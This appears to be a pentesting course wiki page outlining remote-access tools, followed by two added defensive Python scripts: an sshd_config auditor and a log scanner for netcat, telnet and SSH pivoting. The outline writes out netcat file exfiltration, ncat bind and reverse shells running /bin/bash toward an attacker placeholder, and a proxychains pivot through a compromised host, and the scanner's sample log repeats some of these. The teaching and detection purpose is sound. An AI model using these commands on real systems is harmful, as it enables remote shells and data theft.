Pentesting Tools: Remote Access - Paiet/SEC-335 GitHub Wiki

  • Remote access tools
    • SSH
      • De facto remote access protocol for Unix/Linux
      • Allows for access by means of...
        • Username:Password
        • SSH keys
    • TELNET
      • Older, but still around in legacy systems
        • You see this a lot in network equipment
      • Insecure
        • Uses plain text
        • You can sniff...
          • Passwords
          • Other sensitive info
    • NETCAT
      • Networking swiss-army knife
      • Creates just about any kind of TCP connection
      • Great for...
        • Banner grabbing
        • Shell access
          • REVERSE and BIND
        • Data exfil
          1. On ATTACK: nc -nvlp 9999 > exfil.txt
          2. On TARGET: nc -nv 10.0.0.? < topsecret.txt
    • NCAT
      • BIND
        1. On TARGET: ncat --exec /bin/bash --allow <ATTACK IP> -vnl 9999 --ssl
        2. On ATTACK: ncat -v <TARGET IP> 9999 --ssl
      • REVERSE
        1. On ATTACK: ncat --allow <TARGET IP> -vnl 9999 --ssl
        2. On TARGET: ncat --exec /bin/bash -v <ATTACK IP> 9999 --ssl
    • Proxychains
      • Pivoting tool
      • Allows you to use a compromised host as a proxy for reaching otherwise inaccessible targets
      • Uses proxychains.conf
      • DEMO:
        1. ssh -D 127.0.0.1:8888 victim@compromised_host_ip
        2. Open a new terminal
        3. Edit /etc/proxychains.conf
          • Add this line at the bottom: socks4 127.0.0.1 8888
        4. proxychains rdesktop remote_server_ip
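The SSH notes above contrast username:password logins with SSH keys. The script below is an added example (my own, not from the SEC-335 wiki or from OpenSSH) that audits the global section of an sshd_config and reports the settings that leave password-based access open, falling back to the OpenSSH defaults for keywords the file omits. The weak and hardened configs it checks are constructed samples.

```python
"""Audit an sshd_config for settings that undo the 'SSH keys over passwords' advice.

Added example; not from the SEC-335 wiki. Parsing follows sshd_config(5):
keywords are case-insensitive, lines starting with '#' are comments, the
FIRST occurrence of a keyword wins, and everything after a 'Match' line is
conditional, so only the global section is audited. Sample configs below
are constructed for illustration.
"""
import re

# Value OpenSSH uses when the keyword is absent from the global section
DEFAULTS = {
    "passwordauthentication": "yes",
    "permitrootlogin": "prohibit-password",
    "pubkeyauthentication": "yes",
    "permitemptypasswords": "no",
}

# keyword -> (value that counts as weak, why it matters)
CHECKS = {
    "passwordauthentication": ("yes", "password logins allowed: guessed or sprayed credentials work; prefer keys only"),
    "permitrootlogin": ("yes", "root may authenticate with a password; use prohibit-password or no"),
    "pubkeyauthentication": ("no", "key-based login disabled, forcing passwords"),
    "permitemptypasswords": ("yes", "accounts with empty passwords can log in"),
}

# 'Keyword value' or 'Keyword=value'; the lazy key stops at the first separator
DIRECTIVE_RE = re.compile(r"^(\S+?)(?:\s*=\s*|\s+)(.*)$")


def parse_global_section(text):
    """Return {keyword: value} for the global section; first occurrence wins."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = DIRECTIVE_RE.match(line)
        key, value = (m.group(1), m.group(2)) if m else (line, "")
        key = key.lower()
        if key == "match":
            break  # directives after Match apply only to that block
        settings.setdefault(key, value.strip().lower())
    return settings


def audit_sshd_config(text):
    """Return [(keyword, effective_value, message)] for every weak setting found."""
    settings = parse_global_section(text)
    findings = []
    for key, (weak, message) in CHECKS.items():
        effective = settings.get(key, DEFAULTS[key])
        if effective == weak:
            findings.append((key, effective, message))
    return findings


WEAK_CONFIG = """\
# constructed sample: a default-style install that still allows passwords
Port 22
PermitRootLogin yes
PasswordAuthentication yes
ChallengeResponseAuthentication no
"""

HARDENED_CONFIG = """\
# constructed sample: keys only, root cannot use a password
Port 22
PermitRootLogin prohibit-password
PubkeyAuthentication yes
PasswordAuthentication no
PermitEmptyPasswords no
Match User backup
    PasswordAuthentication yes
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        findings = audit_sshd_config(cfg)
        print(f"{name}: {len(findings)} finding(s)")
        for key, value, msg in findings:
            print(f"  {key} = {value}: {msg}")
```

Note that a config with no PasswordAuthentication line at all is reported as weak, because the OpenSSH default is yes; the audit only reads the global section, so the Match block in the hardened sample (which re-enables passwords for one user) is deliberately out of scope and would need a separate per-block check.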
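The Telnet, Netcat/Ncat and proxychains entries above all leave traces in command-line telemetry, which is how a defender notices them. The script below is an added example, not from the SEC-335 wiki or from any tool it names; it parses a constructed process-execution log (the `ts host uid=N cmd="..."` line format is my own assumption) and tags telnet use, netcat listeners, a program attached to a netcat socket (the bind/reverse shell pattern), and an `ssh -D` dynamic forward of the kind the proxychains demo relies on.

```python
"""Flag remote-access tooling in a process-execution log.

Added example, not from the SEC-335 wiki. It takes the tools in the notes
(telnet, nc/ncat bind and reverse shells, ssh -D for a proxychains pivot)
and shows what a defender would look for in command-line telemetry.
The log format and every sample line are constructed for illustration.
"""
import re
import shlex

NETCAT = {"nc", "ncat", "netcat", "nc.traditional", "nc.openbsd"}
# ncat -e/--exec and -c/--sh-exec, and nc -e: run a program over the socket
SHELL_FLAGS = {"-e", "--exec", "-c", "--sh-exec"}

# constructed log format: <timestamp> <host> uid=<n> cmd="<command line>"
LOG_RE = re.compile(r'^(?P<ts>\S+) (?P<host>\S+) uid=(?P<uid>\d+) cmd="(?P<cmd>.*)"$')


def _is_listen_flag(arg):
    """True for -l or a bundled short-flag group containing l (e.g. -nvlp)."""
    return arg.startswith("-") and not arg.startswith("--") and "l" in arg[1:]


def classify(cmd):
    """Return a list of finding tags for one command line (empty if nothing notable)."""
    try:
        argv = shlex.split(cmd)
    except ValueError:
        return ["unparseable command line"]
    if not argv:
        return []
    prog = argv[0].rsplit("/", 1)[-1]  # strip any directory prefix
    args = argv[1:]
    tags = []
    if prog == "telnet":
        tags.append("cleartext remote access (telnet)")
    if prog in NETCAT:
        if any(a in SHELL_FLAGS for a in args):
            tags.append("shell bound to netcat socket (bind/reverse shell)")
        if any(_is_listen_flag(a) for a in args):
            tags.append("netcat listener")
        if "--ssl" in args:
            tags.append("ncat with TLS (payload not inspectable on the wire)")
    if prog == "ssh" and any(a == "-D" or a.startswith("-D") for a in args):
        tags.append("ssh dynamic SOCKS forward (possible pivot)")
    return tags


def scan_log(lines):
    """Return (host, uid, cmd, tags) for every log line with at least one finding."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line; a real pipeline would count these
        tags = classify(m.group("cmd"))
        if tags:
            findings.append((m.group("host"), int(m.group("uid")), m.group("cmd"), tags))
    return findings


SAMPLE_LOG = [  # constructed sample lines
    '2024-05-01T09:00:01Z web01 uid=1001 cmd="ls -la /var/www"',
    '2024-05-01T09:00:05Z web01 uid=1001 cmd="ncat --exec /bin/bash --allow 10.0.0.5 -vnl 9999 --ssl"',
    '2024-05-01T09:01:10Z web01 uid=1001 cmd="nc -nv 10.0.0.5 9999"',
    '2024-05-01T09:02:00Z sw-mgmt uid=0 cmd="telnet 10.0.0.254"',
    '2024-05-01T09:03:00Z jump01 uid=1002 cmd="ssh -D 127.0.0.1:8888 victim@10.0.0.20"',
    '2024-05-01T09:04:00Z web01 uid=1001 cmd="nc -nvlp 9999"',
]

if __name__ == "__main__":
    for host, uid, cmd, tags in scan_log(SAMPLE_LOG):
        print(f"{host} uid={uid}: {cmd}")
        for t in tags:
            print(f"    - {t}")
```

The plain outbound `nc -nv 10.0.0.5 9999` line (the sending side of the exfil example) is deliberately not flagged: on argv alone it is indistinguishable from a port check, and the shell redirect that feeds it a file never appears in the process record. Catching that side needs network telemetry, such as connections to unusual ports or unexpected byte volumes, rather than command-line matching.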